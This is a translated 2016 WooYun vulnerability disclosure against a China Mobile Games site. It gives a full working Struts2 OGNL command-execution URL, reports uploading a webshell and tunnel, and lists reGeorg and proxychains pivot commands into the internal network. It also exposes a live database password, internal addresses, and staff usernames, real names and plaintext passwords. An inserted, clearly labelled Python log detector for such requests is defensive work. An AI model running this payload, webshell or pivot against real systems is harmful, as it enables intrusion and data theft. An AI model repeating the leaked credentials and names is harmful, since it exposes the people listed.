Vulnerability summary

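Bug ID: wooyun-2016-0166727

Title: Remote command execution on a China Mobile Games (中国手游) site, shell obtained and internal network reached

Vendor: cmge.com

Author: hecate

Submitted: 2016-01-02 02:12

Fixed: 2016-01-06 10:52

Disclosed: 2016-01-06 10:52

Vulnerability type: System/service patches not applied in time

Severity: High

Self-assessed Rank: 20

Status: Fixed by vendor

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]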


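Vulnerability details

Disclosure status:

2016-01-02: Details reported to the vendor; awaiting vendor handling
2016-01-06: Vendor confirmed; details disclosed to the vendor only
2016-01-06: Vendor fixed the vulnerability and disclosed it voluntarily; details made public

Brief description:

The vendor plans to send me a gift; courtesy calls for reciprocity, so for the New Year I'll send you one more bug.

Detailed description:

Struts2 remote command execution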

http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29
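
Added example (not part of the original report): an access-log check for requests shaped like the one above, where `debug` and `expression` are the parameters read by Struts2's DebuggingInterceptor when `struts.devMode` is on. The log lines, client addresses and the `classify`/`scan` helpers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Values the Struts2 DebuggingInterceptor accepts for its "debug" parameter.
DEBUG_MODES = {"command", "console", "browser", "xml"}
# OGNL fragments of the kind seen in the request in this report.
OGNL_MARKERS = ("_memberAccess", "allowStaticMethodAccess",
                "java.lang.ProcessBuilder", "java.lang.Runtime",
                "ServletActionContext")
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (severity, reasons) for one access-log line, or None if clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes each value, so %23_memberAccess is matched too.
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    reasons = []
    modes = {v.lower() for v in params.get("debug", [])} & DEBUG_MODES
    if modes:
        reasons.append("struts-debug-param:" + ",".join(sorted(modes)))
    decoded = " ".join(v for values in params.values() for v in values)
    hits = [marker for marker in OGNL_MARKERS if marker in decoded]
    if hits:
        reasons.append("ognl-markers:" + ",".join(hits))
    if not reasons:
        return None
    # A bare debug probe is worth a look; OGNL sandbox tampering is an incident.
    return ("high" if hits else "medium"), reasons

# Constructed sample lines (documentation IP ranges, shortened expression).
SAMPLE = [
    '198.51.100.7 - - [02/Jan/2016:01:40:11 +0800] "GET /login.action?debug=command'
    '&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField'
    '%28%27allowStaticMethodAccess%27%29 HTTP/1.1" 200 512',
    '192.0.2.10 - - [02/Jan/2016:01:41:02 +0800] "GET /login.action?debug=xml HTTP/1.1" 200 2048',
    '192.0.2.11 - - [02/Jan/2016:01:42:30 +0800] "POST /login.action HTTP/1.1" 302 0',
    '192.0.2.12 - - [02/Jan/2016:01:43:05 +0800] "GET /search.action?q=debug%3Dcommand HTTP/1.1" 200 100',
]

def scan(lines):
    """Return [(line_number, severity, reasons)] for every flagged line."""
    found = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, r[0], r[1]) for n, r in found if r]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Access logs record only the query string; to cover the same parameters sent in a POST body, run the check where the body is visible (WAF or servlet filter).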



Uploaded a one-line webshell: http://oss.cmge.com/config.jsp


ifconfig
em1 Link encap:Ethernet HWaddr F8:BC:12:4A:AB:0C
inet addr:123.59.73.98 Bcast:123.59.73.111 Mask:255.255.255.240
inet6 addr: fe80::fabc:12ff:fe4a:ab0c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:234690100 errors:0 dropped:0 overruns:0 frame:0
TX packets:191975833 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:111717497757 (104.0 GiB) TX bytes:55754980927 (51.9 GiB)
Interrupt:35
em2 Link encap:Ethernet HWaddr F8:BC:12:4A:AB:0D
inet addr:10.200.130.7 Bcast:10.200.130.255 Mask:255.255.255.0
inet6 addr: fe80::fabc:12ff:fe4a:ab0d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:228082396 errors:0 dropped:0 overruns:0 frame:0
TX packets:328168633 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:102848879805 (95.7 GiB) TX bytes:173878904275 (161.9 GiB)
Interrupt:38
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:69850555 errors:0 dropped:0 overruns:0 frame:0
TX packets:69850555 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:104502101713 (97.3 GiB) TX bytes:104502101713 (97.3 GiB)


Viewing the database configuration file

#database.jdbc.url=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.shaolin=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.daota=jdbc:mysql://10.200.130.8:3306/goanaysis_daota?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.xingzhan=jdbc:mysql://10.200.130.8:3306/goanaysis_xzhan?useUnicode=true&characterEncoding=UTF-8
database.user=lhm_rw
database.pwd=w&*&PO96>dLD38L)_(HK1P4^LHM^%a


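That is one impressive password.
The web server and the database are on separate hosts. Uploaded tunnel.jsp and proxied into the internal network with reGeorg + proxychains; very few hosts are alive on the internal network, so it looks like it has been isolated.
Let's just connect to the database directly.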

$ python reGeorgSocksProxy.py -p 9527 -u http://oss.cmge.com/tunnel.jsp
$ proxychains mysql -h 10.200.130.8 -u lhm_rw -p



mysql> select * from MANAGE_USER;


All weak passwords

+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| id | UserName | Passwd | TrueName | Sex | Org | RoleId | CreateTime | CreatorId | LastUpdateTime | LastUpdateUserId |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| 40 | root | abc321 | 超级管理员 | 1 | 00 | 40 | 2012-12-13 00:00:00 | 0 | 2015-01-14 14:09:28 | 40 |
| 99 | ken | abc321 | 肖健 | 1 | | 75 | 2015-08-28 15:41:56 | 40 | 2015-08-28 15:41:56 | 40 |
| 101 | oscar | abc321 | 陈韬 | 1 | | 75 | 2015-08-30 00:00:00 | 40 | 2015-10-09 16:29:33 | 40 |
| 107 | danny | abc321 | 许光翔 | 1 | | 75 | 2015-08-31 09:41:58 | 40 | 2015-08-31 09:41:58 | 40 |
| 109 | luke | abc321 | 王晓霖 | 1 | | 75 | 2015-08-31 09:42:31 | 40 | 2015-08-31 09:42:31 | 40 |
| 110 | adam | abc123 | 梁红明 | 1 | | 75 | 2015-09-08 09:51:28 | 40 | 2015-09-08 09:51:28 | 40 |
| 111 | thor | abc321 | 才健楠 | 1 | | 76 | 2015-10-09 00:00:00 | 40 | 2015-11-13 14:16:15 | 40 |
| 112 | alan | abc321 | 彭鹏飞 | 1 | | 75 | 2015-10-10 16:47:42 | 40 | 2015-10-10 16:47:42 | 40 |
| 113 | huanghui | abc321 | 黄辉 | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-11-13 14:15:59 | 40 |
| 114 | will | abc321 | will | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-11-13 14:15:50 | 40 |
| 116 | chenfeng | abc321 | 陈峰 | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-10-22 16:46:53 | 40 |
| 117 | zhangsonlin | abc321 | 张松林 | 1 | | 77 | 2015-10-26 18:11:55 | 40 | 2015-10-26 18:11:55 | 40 |
| 118 | liminmin | abc321 | 李敏敏 | 2 | | 76 | 2015-10-27 14:38:09 | 40 | 2015-10-27 14:38:09 | 40 |
| 119 | likeyu | abc123 | 李科宇 | 1 | | 77 | 2015-11-13 15:06:51 | 40 | 2015-11-13 15:06:51 | 40 |
| 120 | zhangxin | abc123 | 张鈊 | 1 | | 77 | 2015-11-13 15:07:33 | 40 | 2015-11-13 15:07:33 | 40 |
| 121 | huwenming | abc123 | 胡文明 | 1 | | 77 | 2015-11-13 15:07:54 | 40 | 2015-11-13 15:07:54 | 40 |
| 122 | chenpeng | abc123 | 陈鹏 | 1 | | 76 | 2015-11-13 00:00:00 | 40 | 2015-12-21 18:08:16 | 40 |
| 123 | fengmingma | abc321 | fengming.ma@cmge.com | 1 | | 76 | 2015-12-23 15:30:35 | 40 | 2015-12-23 15:30:35 | 40 |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+


Proof of vulnerability:

http://oss.cmge.com/config.jsp
Password: wooyun

Remediation:

Upgrade

Copyright notice: please credit the source hecate@WooYun when reposting


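Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-06 10:48

Vendor reply:

We have notified the developers to apply the upgrade patch. Thanks!

Latest status:

2016-01-06: Fixed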